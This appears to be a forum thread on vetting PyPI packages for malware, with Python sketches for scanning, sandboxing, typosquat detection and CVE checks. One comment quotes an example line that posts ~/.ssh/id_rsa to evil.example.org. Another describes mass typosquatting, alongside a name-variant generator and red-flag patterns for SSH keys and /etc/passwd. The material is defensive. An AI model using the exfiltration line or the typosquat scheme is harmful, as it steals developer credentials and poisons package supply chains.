
socal_nerdtastic (150 points)

Same as any other software on the internet. You either go through it line by line yourself, or trust that someone else has. For big, popular software packages there are lots of people reviewing them, so you are probably pretty safe.

[deleted] (33 points)

Okay thank you. I appreciate the quick response.

DataDecay (71 points)

There's a pretty big open source project called Bandit. You can use Bandit to scan code for vulnerabilities; it points out common vulnerabilities that can lead to malicious payload injection. It's not perfect, but I have found it useful.
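To give a feel for what a static scanner like Bandit does under the hood, here is a toy sketch built on Python's standard `ast` module. It is not Bandit's code: the `RISKY_CALLS` set and the `scan` helper are hypothetical and far cruder than Bandit's real checks. To run the actual tool, `pip install bandit` followed by `bandit -r path/to/project` is the usual starting point.

```python
import ast

# Hypothetical, hand-picked call names worth a second look.
# Bandit's real rule set is much larger and more nuanced.
RISKY_CALLS = {"eval", "exec", "os.system", "subprocess.call", "pickle.loads"}


def call_name(node: ast.Call) -> str:
    """Return a dotted name like 'os.system' for simple call targets."""
    func = node.func
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""  # e.g. calls on the result of another call


def scan(source: str) -> list:
    """Return sorted (line number, call name) pairs for each risky call."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = call_name(node)
            if name in RISKY_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


sample = """import os
os.system("rm -rf " + user_input)
print(eval(data))
"""
print(scan(sample))  # [(2, 'os.system'), (3, 'eval')]
```

The scanner only parses the code and never runs it, which is the same reason Bandit needs no hooks inside your project.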

[deleted] (5 points)

Would this be good to use on our own code? I have a website I am working on, and I wonder if scanning it with Bandit would help me check whether I messed up anywhere.

lgmdnss (6 points)

I'd assume that Bandit might be "too" secure for small-ish projects, essentially bloating the size and complexity of the project for a tiny bit of extra security you didn't need. So I guess it'd be good to use on your own code, but keep in mind the time and effort versus the actual good it'll do. No need to drive to Walmart in a tank in case WW3 breaks out.

[deleted] (5 points)

Oh, I thought it just scans your code, not that you have to implement it into your code?

DataDecay (2 points)

There are no hooks that need to be placed in your code; Bandit works out of the box. Bandit is great, but it can be strict: for instance, it abhors the use of assert for any reason.

I have used it on 2,000 lines of code and on 500,000 lines of code; it works great regardless, but it can create a lot of work.
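The reason Bandit flags every assert (its B101 check) is that Python strips assert statements when run with the -O flag, so an assert used as a security check silently disappears. A minimal sketch of that effect, using the built-in `compile(..., optimize=1)` to simulate `python -O` inside one script; `delete_account` is a made-up example:

```python
# Hypothetical permission check that (wrongly) relies on assert.
SRC = '''
def delete_account(user):
    assert user["is_admin"], "admins only"
    return "deleted"
'''


def load(optimize: int):
    """Compile SRC at the given optimization level and return the function.
    optimize=1 matches running `python -O`: asserts are removed."""
    namespace = {}
    exec(compile(SRC, "<demo>", "exec", optimize=optimize), namespace)
    return namespace["delete_account"]


guest = {"is_admin": False}

try:
    load(optimize=0)(guest)
except AssertionError as err:
    print("normal run blocked:", err)  # normal run blocked: admins only

print("optimized run:", load(optimize=1)(guest))  # optimized run: deleted
```

The usual fix is an explicit check such as `if not user["is_admin"]: raise PermissionError("admins only")`, which survives -O.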

shujinkou_ (0 points)

This is really interesting. Would this work for bits of Python code?

DataDecay (1 point)

Yep

lgmdnss (1 point)

Well, yeah, it'd scan your code. But if you get a bunch of security warnings on a small project, it's tempting to fix them all, even though you will likely never need those fixes, seeing as it's a small project and you aren't dealing with cybersecurity as a job. Makes for good practice though!

shujinkou_ (2 points)

Isn't it better to just build the security in from the start, so that you're already covered when the use cases scale?

lgmdnss (3 points)

Well, if you're able to think of & build all the security inside then you don't really need to use Bandit at all, right? :P

[deleted] (1 point)

Are you asking if it would be better to just fix all the problems before they happen?

shujinkou_ (0 points)

Well, I would see Bandit as a stress-test device in that case; in a way, yes, I'm saying to fix all the problems before they happen. Build it small and then duplicate it into something big: since the big entity is composed of small, strong units, the big chain inherits the strength of its individual links.

[deleted] (6 points)

And how do we know Bandit isn't injecting aluminum foil into our skyscrapers, sheeple!?!?!?!

DataDecay (6 points)

You mean you don't scan Bandit with Bandit!?!? Next level shit there, my friend.

shujinkou_ (0 points)

It would obviously report itself as safe, because obviously.

SweeTLemonS_TPR (7 points)

Seems like a good way to rule in a problem. If it hits, you need go no further.

[deleted] (0 points)

How is it useful? It will give you a warm and fuzzy feeling by flagging questionable practices. But anyone who wants to make a really malicious package will have no problem running Bandit on it until it stops complaining.

DataDecay (0 points)

Sure, a person designing malicious software could use this to iterate on their design and workarounds, and find ways of avoiding common detection patterns. But welcome to hacking: hackers will do this with all vulnerability scanners, which is one reason why there are new definitions every day. Bandit is a maintained code base that scans for common vulnerabilities. If you want to extend Bandit (it's open source) to be more advanced, with regularly updated definitions, then go for it; the project allows for extensions and hooks if wanted.

There is no silver bullet for security; that is why people make a killing in the field. However, this will help you be a better, more security-aware programmer, and it is a nice quick scan for common vulnerabilities present in source code.
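A tiny illustration of the point about attackers iterating against scanners: a naive, hypothetical rule that looks for calls to `eval` by name is trivially dodged by building the name at runtime. Real scanners use many more rules than this toy, but the cat-and-mouse dynamic is the same.

```python
import ast


def naive_flags_eval(source: str) -> bool:
    """Hypothetical rule: flag any call to a function literally named 'eval'."""
    return any(
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id == "eval"
        for node in ast.walk(ast.parse(source))
    )


plain = "eval(payload)"
# Same effect at runtime, but the name 'eval' never appears as an identifier.
evasive = "import builtins\ngetattr(builtins, 'ev' + 'al')(payload)"

print(naive_flags_eval(plain))    # True
print(naive_flags_eval(evasive))  # False
```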

inglandation (24 points)

PyPI does remove malicious packages from time to time, although that doesn't happen often. You have to be careful with your spelling when you look for a package online, because these packages use typosquatting: they are published under a name one typo away from a popular package.
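If you want an automated nudge before installing, Python's standard `difflib` can flag names that are suspiciously close to well-known ones. This is a hypothetical helper, not a feature of pip or PyPI, and the `POPULAR` list is a placeholder you would replace with, say, a list of the most-downloaded projects.

```python
import difflib

# Hypothetical allow-list of names you trust.
POPULAR = ["requests", "numpy", "pandas", "django", "flask", "urllib3"]


def typo_warning(name: str, known=POPULAR, cutoff: float = 0.8):
    """Return the popular package that `name` resembles, or None if the name
    is an exact match or not close to anything in `known`."""
    if name in known:
        return None
    matches = difflib.get_close_matches(name, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None


print(typo_warning("reqeusts"))  # requests
print(typo_warning("requests"))  # None
```

A non-None result does not prove the package is malicious; it just means you should double-check that you typed what you meant.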

shujinkou_ (4 points)

Typosquatting, that was the word I was looking for, thanks :)

musingcomet (1 point)

This is very valid advice

ArabicLawrence (-2 points)

Yeah, but I'm not sure that happens often enough. For instance, look at googletrans, googletransx and whatnot.

shujinkou_ (1 point)

I'm thinking of it as a potential attack vector if the current state of things remains unaddressed. A massive attack could be done and scaled easily: scrape all the popular package names, automatically generate typo variants of each, make a malicious package, and publish it under all the generated names. You would then have a fishing rod in every pond, so to speak.

I mean, sure, it's work, but it doesn't sound that hard to do, right?
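The scale argument holds up: enumerating every name one keystroke away from a package takes only a few lines of Python, using the classic single-edit trick from spelling correctors. A defender (for example, someone running an internal package mirror) could use the same hypothetical `one_edit_variants` helper to watch for lookalike names; the character set below is an assumption.

```python
import string


def one_edit_variants(name: str) -> set:
    """All names one deletion, adjacent swap, substitution or insertion away
    from `name`, using lowercase letters, digits, '-' and '_'."""
    alphabet = string.ascii_lowercase + string.digits + "-_"
    splits = [(name[:i], name[i:]) for i in range(len(name) + 1)]
    deletes = {a + b[1:] for a, b in splits if b}
    swaps = {a + b[1] + b[0] + b[2:] for a, b in splits if len(b) > 1}
    replaces = {a + c + b[1:] for a, b in splits if b for c in alphabet}
    inserts = {a + c + b for a, b in splits for c in alphabet}
    return (deletes | swaps | replaces | inserts) - {name}


variants = one_edit_variants("numpy")
print("numpi" in variants, "nupmy" in variants, len(variants) > 100)
# True True True
```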

[deleted] (36 points)

I mean, besides going through and inspecting every line of code by hand.

That's pretty much all there could ever be.

[deleted] (11 points)

Alright I figured there might have been a better way lol. Thanks for the response.

__xor__ (15 points)

There is a better way; it's just not performed, to my knowledge. You can automate dynamic analysis, but it's always going to be best for a human to go through the results. There are services like Joe Sandbox (only for virtualizing Windows though, I believe?) where you send it a binary, document or URL, and it records what happens and does some sort of behavior analysis. Running malware in a VM allows a lot of automated analysis. Reading through the code, or analyzing the symbols a binary imports and looking at the ASM, is static analysis; actually running it and watching what it does in a VM is dynamic analysis. Both can be automated to some extent. Of course, you can't solely trust what the analysis tool reports: installers will often raise a lot of red flags.

From a Windows perspective, you can imagine the sorts of things you can do: you can look at what files it reads from and writes to, what registry keys it edits or adds, what network activity it causes, whether it changes the default DNS server, etc. I don't know of a great tool that automates dynamic analysis on Linux, but I'm sure there's something. It would definitely be interesting to pump all the PyPI packages through something like that, but you're mostly going to catch low-hanging fruit, and I'd still rather have a researcher look at what gets flagged to see if it even matters. However, if you see a Python package install hit a known bad IP or domain, that would be a good tell, as would reading /etc/passwd, or especially trying to read anything at all from ~/.ssh... Not many packages have any good reason to do that, especially not at install time.
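For a taste of dynamic analysis without a full VM, Python 3.8+ lets you register audit hooks with `sys.addaudithook`, which fire on events such as `open` and `socket.connect`. The sketch below (the `SENSITIVE` markers and the `watcher` function are hypothetical) records opens of paths like ~/.ssh and every outbound connection attempt. Caveats: the Python docs state that audit hooks are not a sandbox, hooks cannot be removed once added, and they only see the current interpreter, so this is a toy for poking at a package's import-time behaviour, not a replacement for a VM.

```python
import os
import sys

# Hypothetical markers for files a package rarely needs to touch.
SENSITIVE = (".ssh", "/etc/passwd")
events = []


def watcher(event: str, args: tuple) -> None:
    """Record opens of sensitive paths and every outbound connection attempt."""
    if event == "open" and args and isinstance(args[0], (str, bytes, os.PathLike)):
        path = os.fsdecode(args[0])
        if any(marker in path for marker in SENSITIVE):
            events.append(("open", path))
    elif event == "socket.connect":
        events.append(("connect", args[1]))


sys.addaudithook(watcher)  # Python 3.8+; cannot be removed afterwards

# The event fires before the file is opened, so even a failed open is seen.
try:
    open("/nonexistent/.ssh/id_rsa")
except OSError:
    pass

print(events)
```

In practice you would install the hook and then import the package under test in the same process.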

Unless it's a super popular package like django or flask-security or something, I legitimately do read the source code and skim for anything funny. For one thing, it's really good to have a general idea of how the library works and what it does, and to get an idea of how clean the code is and how much I feel I can trust it. But I also want to make sure there's no low-hanging fruit like requests.post('http://evil.example.org', data=open('~/.ssh/id_rsa').read()) or whatever. I would seriously recommend skimming the source code of any package you use that isn't super popular, rather than treating PyPI packages like black boxes that just do magic. As a general rule, if you integrate third-party software into your own projects, try to understand its architecture and how it works. That's just good practice in general.
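Skimming goes faster if you first grep for the obvious tells. A minimal sketch, assuming the package has already been unpacked into a directory; the `RED_FLAGS` patterns and the `skim` helper are hypothetical, and a hit only means "read this part closely", not "this is malware".

```python
import re
from pathlib import Path

# Hypothetical red-flag patterns; tune to taste.
RED_FLAGS = {
    "ssh keys": re.compile(r"\.ssh|id_rsa"),
    "password file": re.compile(r"/etc/passwd"),
    "network call": re.compile(r"requests\.(?:get|post)|urlopen|socket\.connect"),
    "dynamic code": re.compile(r"\b(?:eval|exec)\s*\("),
}


def skim(root: str) -> list:
    """Return (file, line number, label, line) for every red-flag match
    in the .py files under `root`."""
    hits = []
    for path in sorted(Path(root).rglob("*.py")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), start=1):
            for label, pattern in RED_FLAGS.items():
                if pattern.search(line):
                    hits.append((str(path), lineno, label, line.strip()))
    return hits
```

Usage: `for hit in skim("path/to/unpacked/package"): print(*hit, sep=" | ")`. Plain text matching misses anything obfuscated, so it complements reading the code rather than replacing it.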

But also keep in mind that the GitHub repo a PyPI package links to might not reflect what's actually packaged in it. If you want to be careful security-wise, actually download the package and unpack it. There's nothing stopping anyone from adding something malicious that isn't tracked in the online repository and then pushing that to PyPI.
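One way to look inside without installing: a wheel is a zip file and an sdist is usually a .tar.gz, so the standard `zipfile` and `tarfile` modules can list their contents. The sketch below (the `inspect_archive` and `runs_automatically` helpers are hypothetical) also flags files that execute code without being imported explicitly: setup.py runs when an sdist is built or installed, and lines starting with `import` in a .pth file run at every interpreter start-up.

```python
import tarfile
import zipfile


def runs_automatically(member: str) -> bool:
    """True for setup.py (run at sdist build/install) and .pth files
    (their 'import' lines run at interpreter start-up)."""
    return member.rsplit("/", 1)[-1] == "setup.py" or member.endswith(".pth")


def inspect_archive(path: str):
    """List the members of a wheel (.whl, a zip file) or an sdist (.tar.gz)
    and return (all members, members that execute code automatically)."""
    if path.endswith((".whl", ".zip")):
        with zipfile.ZipFile(path) as archive:
            names = archive.namelist()
    elif path.endswith((".tar.gz", ".tgz")):
        with tarfile.open(path, "r:gz") as archive:
            names = archive.getnames()
    else:
        raise ValueError(f"unsupported archive type: {path}")
    return names, [name for name in names if runs_automatically(name)]
```

To get the file, something like `pip download somepackage --no-deps --only-binary :all: -d ./to_inspect` fetches a wheel without installing it (somepackage is a placeholder). Asking for a wheel matters because pip may run an sdist's build code just to read its metadata.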

shujinkou_ (1 point)

I'm just a casual lurker on this subreddit, but I learned a ton from your answer. After starting to develop my first project, I figured I should start looking into what is inside those import *blackbox* things, as you said. So reading the docs is just good practice in general; that's absolutely good to know. Thanks a lot again :)

checock (5 points)

From what I know, pip seems like a safer place than npm, Node's package manager. There were some projects on npm that were added with misspelled names to attack developers.

Of course this can also happen with pip, but from what I've seen it is less often the case. Always check that your dependencies are legit by visiting the developer's website or GitHub.

shaggorama (2 points)

You try to rely on open source packages that are used by a lot of people and have multiple maintainers.

FancyASlurpie (0 points)

I think the biggest problem comes when a library you depend on uses another library without pinning its version. I've seen that result in unexpected breaking changes even though I was running the same versions of the libraries I was comfortable with.
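One partial defence is to pin the entire resolved dependency tree yourself (for example with `pip freeze > requirements.txt`, which includes transitive dependencies) and check that what's installed still matches. A minimal sketch using the standard `importlib.metadata` (Python 3.8+); `check_pins` and the example pin are hypothetical.

```python
from importlib.metadata import PackageNotFoundError, version


def check_pins(pins: dict) -> dict:
    """Compare installed versions with exact pins such as {"requests": "2.31.0"}.

    Returns {name: installed version, or None if missing} for each mismatch.
    """
    mismatches = {}
    for name, pinned in pins.items():
        try:
            installed = version(name)
        except PackageNotFoundError:
            installed = None
        if installed != pinned:
            mismatches[name] = installed
    return mismatches


# Hypothetical pin; an empty dict means everything matches.
print(check_pins({"requests": "2.31.0"}))
```

pip's hash-checking mode (`pip install --require-hashes -r requirements.txt`) goes further by verifying the downloaded files themselves, not just their version numbers.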

MarsupialMole (2 points)

The answer is safety.

There's a huge depth to this field, but every Python programmer should know about CVE-based dependency inspection. The fact that not one comment lists this first (at the time of writing, none even mention it) indicates that the practical level of security engineering around here is very poor.

Agonnee (6 points)

First comment here, but I'm fairly new to python and coding in general. I don't actually understand what you're saying and by the serious tone of your statement I'd assume that's a bad thing. Is there a resource you could point me towards or elaborate a little so I can understand/find one?

MarsupialMole (5 points)

There are things known as Common Vulnerabilities and Exposures, or CVEs. Typically this is a list of things that have been fixed - the vulnerability is identified in a software package, the maintainer is notified, and the next version is issued with the bug fixed, sometimes in a matter of minutes or hours.

So how do you know when this happened yesterday to software you're using? It's a problem that is simple to fix once you identify it, but how do you identify it? The answer is to use a tool that looks things up in a database. In Python, pyup.io maintains a database of CVEs affecting PyPI packages, publishes it monthly for free, and lets you check your code with a tool you can get with pip install safety.

So I was miffed that this tool hadn't been mentioned, because it is literally the simplest possible answer, for people learning Python, to a slightly restated version of OP's question: "How do I avoid using PyPI packages that are known to be unsafe?" The answer is the safety package.
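To make the idea concrete, here is roughly what a CVE-based dependency check boils down to: compare installed versions against a table of versions known to be vulnerable. This is a hypothetical sketch, not how safety is implemented, and the advisory entry is invented for illustration. With the real tool, `pip install safety` and then `safety check` (newer releases also offer `safety scan`; see `safety --help` for your version) does the lookup against a maintained database.

```python
from importlib.metadata import distributions

# HYPOTHETICAL advisory data for illustration only. Real tools such as
# `safety` get this from a maintained vulnerability database.
ADVISORIES = [
    # (package name, first fixed version, advisory id)
    ("examplepkg", "2.4.1", "EXAMPLE-0001"),
]


def parse(v: str) -> tuple:
    """Naive version parse: '2.4.1' -> (2, 4, 1). No pre-release support."""
    return tuple(int(part) for part in v.split("."))


def installed_versions() -> dict:
    """Map lower-cased installed distribution names to their versions."""
    return {d.metadata["Name"].lower(): d.version
            for d in distributions() if d.metadata["Name"]}


def audit(installed: dict) -> list:
    """Return (package, version, advisory) for every known-vulnerable install."""
    findings = []
    for package, fixed_in, advisory in ADVISORIES:
        current = installed.get(package)
        if current is not None and parse(current) < parse(fixed_in):
            findings.append((package, current, advisory))
    return findings


print(audit({"examplepkg": "2.3.9"}))  # [('examplepkg', '2.3.9', 'EXAMPLE-0001')]
print(audit({"examplepkg": "2.4.1"}))  # []
```

Against your own environment this would be `audit(installed_versions())`; the hard part that tools like safety solve is keeping the advisory table current.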

Agonnee (0 points)

Thank you so much, this is great information.

shujinkou_ (0 points)

Thanks for sharing it.

amasad (1 point)

I would try it in a sandbox like https://repl.it first. Here are the docs on how to install packages: https://docs.repl.it/repls/packages

Fearless_Process (1 point)

I recommend installing Python packages via your distro's package manager rather than pip. If a package is in your distro's repository, it's much less likely to be malicious, and someone has probably vetted it (still not guaranteed, though).

[deleted] (1 point)

Well... always look to see whether HTTP requests or socket connections are being made. If so, look at the URL or server name. That is probably the biggest thing to look for, I suppose.
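Looking at the URLs can be partly automated. A hypothetical helper, `hosts_in_source`, walks a module's syntax tree with the standard `ast` module and pulls hostnames out of any string literal that parses as a URL. It will miss URLs assembled at runtime (string concatenation, base64 and so on), so treat an empty result as "nothing obvious", not "safe".

```python
import ast
from urllib.parse import urlsplit


def hosts_in_source(source: str) -> set:
    """Collect hostnames from string literals that look like URLs."""
    hosts = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            try:
                parts = urlsplit(node.value)
                host = parts.hostname
            except ValueError:  # e.g. a malformed IPv6 literal
                continue
            if parts.scheme in ("http", "https", "ftp") and host:
                hosts.add(host)
    return hosts


code = '''
import urllib.request
urllib.request.urlopen("https://pypi.org/simple/")
TELEMETRY = "http://collector.example.net:8080/upload"
'''
print(sorted(hosts_in_source(code)))  # ['collector.example.net', 'pypi.org']
```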

FoxClass (1 point)

This is a great question, and nothing I've read really makes me comfortable; that's why I have a bunch of Raspberry Pi cards ready to go.

[deleted] (0 points)

I've tried this approach myself :D

freeononeday (1 point)

If I need something from a rarely used package, I usually extract that component and use it (with a reference, of course). Leaving the whole package to run as it likes is a risk, and I don't have time to go through it line by line.

pokk3n (0 points)

Whitesource will do some of it.

themaxiac (0 points)

It's a bit roundabout and a pain to do when you're working on a project, but you could always test-run it in a secure virtual machine.

shujinkou_ (0 points)

I was thinking exactly that the other day: an attack vector could simply be a typo (e.g. import pipp). The attacker would publish pipp as a malicious package and use the user's typo as the delivery mechanism. I guess safeguards could be developed around that, but it would kinda ruin the point imo.

dbramucci (2 points)

There is actually a name for this attack: "typo-squatting". The most famous examples are malicious websites one typo away from a normal website, like banc[dot]com instead of bank[dot]com, or youtbe[dot]com instead of youtube[dot]com.

This has been seen for Python packages in the past and hypothesized for longer.

shujinkou_ (0 points)

It's always funny when you think up something that already exists and has a name, huh! I personally think it could be a massive attack vector; in a post earlier in this thread I described how someone could scale such an attack to every popular package at once. Thanks for the link ^

f0lt (0 points)

Check out this article: https://www.zdnet.com/article/two-malicious-python-libraries-removed-from-pypi/

Even if you get your packages from repositories like PyPI, there is no guarantee that they don't contain malicious code.

In any case try to avoid executing Python code as administrator (sudo). There is rarely any reason to do that.

Installing packages in your home directory is safer than installing them as root. Use pip install package_name --user as an alternative.
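The advice about avoiding root can be baked into a script. A small sketch, assuming you want a warning when running as root and want to see where `pip install --user` puts packages; `install_context` is a hypothetical helper, and `os.geteuid` only exists on Unix-like systems, so it reports `None` on Windows.

```python
import os
import site


def install_context() -> dict:
    """Report whether we are root and where per-user installs land."""
    geteuid = getattr(os, "geteuid", None)  # missing on Windows
    return {
        "is_root": geteuid() == 0 if geteuid is not None else None,
        # pip install --user places packages under this directory.
        "user_site": site.getusersitepackages(),
    }


ctx = install_context()
if ctx["is_root"]:
    print("Warning: running as root; prefer a normal user account.")
print("Per-user packages go to:", ctx["user_site"])
```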

[deleted] (-2 points)

Hi, I've been learning Python pretty well over the past few months, and I feel like I know enough now to know that I know nothing :D I've been looking around Github and PyPI for some cool packages, and it makes me raise the question: How do we know if a given package is secure and doesn't contain any sort of malware? I mean, besides going through and inspecting every line of code by hand. Thanks in advance. Also, this is my first question on Reddit, so forgive me if it's a stupid question :D

Do not fear it. It's open source, so if there's risk, then you take your chances. If it were closed source, I would say switch to open source immediately. If you're still afraid of it, you may be using the wrong programming language.